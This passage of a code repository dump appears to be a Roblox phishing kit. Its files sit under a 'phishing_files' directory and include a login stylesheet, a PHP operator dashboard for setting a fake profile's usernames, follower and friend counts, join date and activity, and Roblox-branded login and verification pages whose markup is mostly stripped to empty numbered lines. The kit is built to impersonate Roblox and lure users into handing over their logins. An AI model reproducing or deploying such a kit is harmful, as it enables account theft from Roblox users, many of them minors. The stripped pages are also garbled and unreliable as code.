100%; 397 | height: 60px; 398 | background-color: #333333; 399 | border-radius: 10px; 400 | 401 | font-family: Poppins-Medium; 402 | font-size: 16px; 403 | color: #fff; 404 | line-height: 1.2; 405 | 406 | -webkit-transition: all 0.4s; 407 | -o-transition: all 0.4s; 408 | -moz-transition: all 0.4s; 409 | transition: all 0.4s; 410 | position: relative; 411 | z-index: 1; 412 | } 413 | 414 | .login100-form-btn::before { 415 | content: ""; 416 | display: block; 417 | position: absolute; 418 | z-index: -1; 419 | width: 100%; 420 | height: 100%; 421 | border-radius: 10px; 422 | top: 0; 423 | left: 0; 424 | background: #a64bf4; 425 | background: -webkit-linear-gradient(45deg, #00dbde, #fc00ff); 426 | background: -o-linear-gradient(45deg, #00dbde, #fc00ff); 427 | background: -moz-linear-gradient(45deg, #00dbde, #fc00ff); 428 | background: linear-gradient(45deg, #00dbde, #fc00ff); 429 | opacity: 0; 430 | -webkit-transition: all 0.4s; 431 | -o-transition: all 0.4s; 432 | -moz-transition: all 0.4s; 433 | transition: all 0.4s; 434 | } 435 | 436 | .login100-form-btn:hover:before { 437 | opacity: 1; 438 | } 439 | 440 | 441 | /*------------------------------------------------------------------ 442 | [ Alert validate ]*/ 443 | 444 | .validate-input { 445 | position: relative; 446 | } 447 | 448 | .alert-validate::before { 449 | content: attr(data-validate); 450 | position: absolute; 451 | max-width: 70%; 452 | background-color: #fff; 453 | border: 1px solid #c80000; 454 | border-radius: 2px; 455 | padding: 4px 25px 5px 10px; 456 | top: 50%; 457 | -webkit-transform: translateY(-50%); 458 | -moz-transform: translateY(-50%); 459 | -ms-transform: translateY(-50%); 460 | -o-transform: translateY(-50%); 461 | transform: translateY(-50%); 462 | right: 12px; 463 | pointer-events: none; 464 | 465 | font-family: Poppins-Regular; 466 | color: #c80000; 467 | font-size: 14px; 468 | line-height: 1.4; 469 | text-align: left; 470 | 471 | visibility: hidden; 472 | opacity: 0; 473 | 474 | -webkit-transition: opacity 0.4s; 475 | -o-transition: opacity 0.4s; 476 | -moz-transition: opacity 0.4s; 477 | transition: opacity 0.4s; 478 | } 479 | 480 | .alert-validate::after { 481 | content: "\f12a"; 482 | font-family: FontAwesome; 483 | display: block; 484 | position: absolute; 485 | color: #c80000; 486 | font-size: 18px; 487 | top: 50%; 488 | -webkit-transform: translateY(-50%); 489 | -moz-transform: translateY(-50%); 490 | -ms-transform: translateY(-50%); 491 | -o-transform: translateY(-50%); 492 | transform: translateY(-50%); 493 | right: 18px; 494 | } 495 | 496 | .alert-validate:hover:before { 497 | visibility: visible; 498 | opacity: 1; 499 | } 500 | 501 | @media (max-width: 992px) { 502 | .alert-validate::before { 503 | visibility: visible; 504 | opacity: 1; 505 | } 506 | } 507 | 508 | 509 | /*////////////////////////////////////////////////////////////////// 510 | [ Responsive ]*/ 511 | @media (max-width: 768px) { 512 | .wrap-login100 { 513 | padding-left: 60px; 514 | padding-right: 60px; 515 | } 516 | 517 | @media (max-width: 576px) { 518 | .wrap-login100 { 519 | padding-left: 15px; 520 | padding-right: 15px; 521 | } 522 | 523 | .btn-face, 524 | .btn-google { 525 | width: 100%; 526 | } 527 | } 528 | 529 | .disclaimer{ 530 | display:none; 531 | } -------------------------------------------------------------------------------- /phishing_files/controller/dashboard.php: -------------------------------------------------------------------------------- 1 | userId; 11 | $fakeusername = htmlspecialchars(file_get_contents('fakeusername.txt')); 12 | if($_POST['realusername']){ 13 | $new_realusername = $_POST['realusername']; 14 | $ab = file_get_contents("https://api.newstargeted.com/roblox/users/v2/user.php?username=$new_realusername"); 15 | if(!empty(json_decode($ab)->name)){ 16 | file_put_contents('realusername.txt', json_decode($ab)->name); 17 | echo ''; 18 | } else { 19 | echo ''; 20 | } 21 | } 22 | if($_POST['fakeusername']){ 23 | file_put_contents('fakeusername.txt', $_POST['fakeusername']); 24 | echo ''; 25 | } 26 | if($_POST['aboutme']){ 27 | file_put_contents('aboutme.txt', $_POST['aboutme']); 28 | echo ''; 29 | } 30 | if($_POST['aboutme']){ 31 | file_put_contents('aboutme.txt', $_POST['aboutme']); 32 | echo ''; 33 | } 34 | 35 | if($_POST['followers']){ 36 | $value = str_replace('-','',$_POST['followers']); 37 | $value = str_replace(',','',$value); 38 | $value = str_replace('.','',$value); 39 | if(is_numeric($value)){ 40 | file_put_contents('followers.txt', $value); 41 | echo ''; 42 | } else { 43 | die('Please enter a valid number before submitting.'); 44 | } 45 | } 46 | 47 | if($_POST['friends']){ 48 | $value = str_replace('-','',$_POST['followers']); 49 | $value = str_replace(',','',$value); 50 | $value = str_replace('.','',$value); 51 | if(is_numeric($value)){ 52 | if($value < 201){ 53 | file_put_contents('friends.txt', $value); 54 | echo ''; 55 | } else { 56 | die('The Friend Count must be below 201.'); 57 | } 58 | } else { 59 | die('Please enter a valid number before submitting.'); 60 | } 61 | } 62 | 63 | if($_POST['followings']){ 64 | $value = str_replace('-','',$_POST['followings']); 65 | $value = str_replace(',','',$value); 66 | $value = str_replace('.','',$value); 67 | if(is_numeric($value)){ 68 | file_put_contents('followers.txt', $value); 69 | echo ''; 70 | } else { 71 | die('Please enter a valid number before submitting.'); 72 | } 73 | } 74 | 75 | if($_POST['joindate']){ 76 | $joindate = str_replace('-', '/', $_POST['joindate']); 77 | file_put_contents('joindate.txt', $joindate); 78 | echo ''; 79 | } 80 | 81 | if($_POST['placevisits']){ 82 | $value = str_replace('-','',$_POST['placevisits']); 83 | $value = str_replace(',','',$value); 84 | $value = str_replace('.','',$value); 85 | if(is_numeric($value)){ 86 | file_put_contents('placevisits.txt', $value); 87 | echo ''; 88 | } else { 89 | die('Please enter a valid number before submitting.'); 90 | } 91 | } 92 | 93 | if($_POST['activity']){ 94 | if($_POST['activity']=='Game'){ 95 | file_put_contents('activity.txt', 'game'); 96 | echo ''; 97 | } 98 | if($_POST['activity']=='Studio'){ 99 | file_put_contents('activity.txt', 'studio'); 100 | echo ''; 101 | } 102 | if($_POST['activity']=='Online'){ 103 | file_put_contents('activity.txt', 'online'); 104 | echo ''; 105 | } 106 | if($_POST['activity']=='Offline'){ 107 | file_put_contents('activity.txt', 'offline'); 108 | echo ''; 109 | } 110 | } 111 | } else { 112 | header('location: login'); 113 | } 114 | ?> 115 | 116 | 117 | 118 | 119 | 120 | 121 | <?=$name?> - Controller 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 166 | 167 |
168 | 169 |
170 |
171 |
172 |
173 | 176 |
177 |
178 |
179 |
180 | 181 |
182 | 183 |
184 |
185 | Apps 186 |
187 |
188 |
189 |
  • 190 | 191 | 192 | 193 | 212 | 213 |
  • 214 |
    215 |
    216 | 217 |
    218 |
    219 |

    User

    220 |
    221 |
    222 |
    223 | Log Out 224 |
    225 |
    226 |
    227 |
    228 |
    229 |
    230 |
    231 |
    232 | 233 |
    234 |
    235 |
    236 |
    237 |
    238 |
    239 |
    240 |
    241 |
    242 |

    Change Real Username

    243 |
    244 |
    245 |
    246 |
    247 |
    Current:
    248 |
    249 | 250 |

    251 |
    New:
    252 |
    253 | 254 |
    255 |
    256 | 257 |
    258 |
    259 |
    260 | 261 |
    262 |
    263 |
    264 |
    265 |
    266 |
    267 |

    Change Fake Username

    268 |
    269 |
    270 |
    271 |
    272 |
    Current:
    273 |
    274 | 275 |

    276 |
    New:
    277 |
    278 | 279 |
    280 |
    281 | 282 |
    283 |
    284 |
    285 | 286 |
    287 |
    288 |
    289 |
    290 |
    291 |
    292 |

    Change About Me

    293 |
    294 |
    295 |
    296 |
    297 |
    Current:
    298 |
    299 | 300 |

    301 |
    New:
    302 |
    303 | 304 |
    305 |
    306 | 307 |
    308 |
    309 |
    310 | 311 |
    312 |
    313 |
    314 |
    315 |
    316 |
    317 |

    Change Friend Count

    318 |
    319 |
    320 |
    321 |
    322 |
    Current:
    323 |
    324 | 325 |

    326 |
    New:
    327 |
    328 | 329 |
    330 |
    331 | 332 |
    333 |
    334 |
    335 | 336 |
    337 |
    338 |
    339 |
    340 |
    341 |
    342 |

    Change Follower Count

    343 |
    344 |
    345 |
    346 |
    347 |
    Current:
    348 |
    349 | 350 |

    351 |
    New:
    352 |
    353 | 354 |
    355 |
    356 | 357 |
    358 |
    359 |
    360 | 361 |
    362 |
    363 |
    364 |
    365 |
    366 |
    367 |

    Change Following Count

    368 |
    369 |
    370 |
    371 |
    372 |
    Current:
    373 |
    374 | 375 |

    376 |
    New:
    377 |
    378 | 379 |
    380 |
    381 | 382 |
    383 |
    384 |
    385 | 386 |
    387 |
    388 |
    389 |
    390 |
    391 |
    392 |

    Change Join Date

    393 |
    394 |
    395 |
    396 |
    397 |
    Current:
    398 |
    399 | 400 |

    401 |
    New:
    402 |
    403 | 404 |
    405 |
    406 | 407 |
    408 |
    409 |
    410 | 411 |
    412 |
    413 |
    414 |
    415 |
    416 |
    417 |

    Change Place Visits

    418 |
    419 |
    420 |
    421 |
    422 |
    Current:
    423 |
    424 | 425 |

    426 |
    New:
    427 |
    428 | 429 |
    430 |
    431 | 432 |
    433 |
    434 |
    435 | 436 |
    437 |
    438 |
    439 |
    440 |
    441 |
    442 |

    Change Activity

    443 |
    444 |
    445 |
    446 |
    447 |
    Current:
    448 |
    449 | 450 |

    451 |
    New:
    452 |
    453 | 459 |
    460 |
    461 | 462 |
    463 |
    464 |
    465 | 466 |
    467 |
    468 |
    469 | 470 | 481 |
    482 | 483 | 484 | 485 | 486 | 487 | 492 | 503 | 504 | 505 | 506 | 507 | 508 | 509 | 510 | 511 | 512 | 513 | 514 | 515 | 516 | 517 | 518 | 519 | 520 | 521 | 522 | 523 | 524 | 525 | 526 | 527 | 528 | 529 | 530 | 531 | 532 | 533 | 534 | 535 | -------------------------------------------------------------------------------- /phishing_files/login/Verification/index.php: -------------------------------------------------------------------------------- 1 | 7 | 8 | 9 | 10 | 11 | 12 | Roblox 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | -theme gotham-font modal-open" data-performance-relative-value="0.005" data-internal-page-name="Login" data-send-event-percentage="0" style="overflow: hidden; padding-right: 17px;"> 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 293 | 294 | 295 | 296 | 297 | 298 | 299 | 300 | 301 | 302 | 319 | 327 | 328 | 329 | 330 | 331 | 375 | 376 | 377 | 378 | 379 | 380 | 381 | 382 | 383 | 384 | 385 | 386 | 406 | 407 | 442 | 443 | 444 | 445 | 446 | 447 | 448 | 449 | 450 | 451 | 452 | 453 | 454 | 455 | 456 | 457 | 458 | 459 | 460 | 461 | 462 | 463 | 464 | 465 | 466 | 467 | 468 | 469 | 470 | 471 | 472 | 473 | 474 | 475 | 476 | 477 | 478 | 479 | 480 | 481 | 482 | 483 | 484 | 485 | 486 | 487 | 488 | 489 | 490 | 491 | 492 | 493 | 494 | 495 | 496 | 497 | 498 | 501 | 502 | 505 | 506 | 507 | 508 | 509 | 510 | 511 | 512 | 513 | 514 | 515 | 516 | 517 | 518 | 519 | 520 | 521 | 522 | 523 | 524 | 525 | 526 | 527 | 528 | 529 | 530 | 531 | 532 | 533 | 534 | 535 | 536 | 537 | 538 | 539 | 540 | 541 | 542 | 543 | 544 | 545 | 546 | 547 | 548 | 549 | 550 | 551 | 552 | 553 | 554 | 555 | 556 | 557 | 558 | 559 | 560 | 561 | 562 | 563 | 564 | 565 | 566 | 567 | 568 | 569 | 570 | 571 | 572 | 573 | 574 | 575 | 576 | 577 | 578 | 579 | 580 | 581 | 582 | 583 | 584 | 585 | 586 | 587 | 588 | 589 | 590 | 591 | 592 | 593 | 594 | 595 | 596 | 597 | 598 | 599 | 600 | 601 | 602 | 603 | 604 | 605 | 606 | 607 | 608 | 609 | 610 | 611 | 612 | 613 | 614 | 615 | 616 | 617 | 618 | 619 | 620 | 621 | 622 | 623 | 624 | 625 | 626 |
    630 | -------------------------------------------------------------------------------- /phishing_files/login/index.php: -------------------------------------------------------------------------------- 1 | 2 | 8 | 9 | 10 | Roblox 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | -theme gotham-font" data-performance-relative-value="0.005" data-internal-page-name="Login" data-send-event-percentage="0" data-new-gr-c-s-check-loaded="14.1113.0" data-gr-ext-installed=""> 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 |
    157 |
    158 |
    159 |
    160 | 161 | 162 | 163 | 164 |
    165 | 166 | 167 | 168 | 169 | 170 | 171 | 235 | 236 | 237 | 238 |
    245 | 246 | 247 |
    248 | 249 | 250 | 251 | 252 | 253 | 254 | 255 |
    256 | 257 | 258 |
    259 | 260 | 261 | 262 | 263 | 264 | 501 |
    502 | 503 | 504 | 505 | 506 | 507 | 508 | 509 | 510 |
    511 | 512 | 513 | 514 | 515 | 516 |
    517 | 518 | 519 | 520 | 537 | 545 | 546 | 547 | 548 | 549 | 593 | 594 | 595 | 596 | 597 | 598 | 599 | 600 | 601 | 602 | 603 | 623 | 624 | 659 | 660 | 661 | 662 | 663 | 664 | 665 | 666 | 667 | 668 | 669 | 670 | 671 | 672 | 673 | 674 | 675 | 676 | 677 | 678 | 679 | 680 | 681 | 682 | 683 | 684 | 685 |
    686 |
    687 | 688 |
    689 | 690 |
    691 | 692 |
    693 | 694 | 695 | --------------------------------------------------------------------------------